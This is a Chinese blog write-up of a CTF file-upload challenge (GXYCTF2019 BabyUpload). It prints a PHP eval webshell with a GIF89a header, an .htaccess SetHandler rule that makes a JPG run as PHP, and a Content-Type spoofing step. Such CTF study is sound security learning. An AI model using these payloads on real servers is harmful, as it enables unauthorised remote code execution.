Buuctf-[GXYCTF2019]BabyUpload

文章描述了一次CTF挑战中如何尝试上传一句话木马绕过文件类型检查。作者首先尝试上传.php文件,然后转换为.jpg并利用.htaccess设置文件处理方式为PHP,最终成功执行代码并找到flag。
摘要由CSDN通过智能技术生成

  一周没做ctf了,今天看一道upload文件上传题:

 

 

我试图直接上传一句话木马的.php文件,如下:

 

php后缀的文件不行的话,我可以上传jpg:

 发现有文件头检查,使用下面这个一句话木马:

GIF89a
<script language='php'>eval($_POST['shell']);</script>

这会文件是已经上传成功了,但是jpg文件的一句话木马还不行,它无法执行,也就是现在我们还无法使用蚁剑连接,然而又因为:后缀名但凡包含ph的都被过滤了,这就意味着修改怎么修改后缀php都无法绕过,只能另寻他法,

下面试试上传一个 .htaccess 

文件名为 .htaccess ,内容为:

<FilesMatch "test.jpg">
       SetHandler  application/x-httpd-php
</FilesMatch>       

还是被检测到文件类型不对了,可以试试更改 Content-Type 为 image/jpeg:

BP抓包:

 上传成功,我的文件test.jpg 现在就可以以php 文件执行,可以通过蚁剑连接:

 

在根目录下找到flag:

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值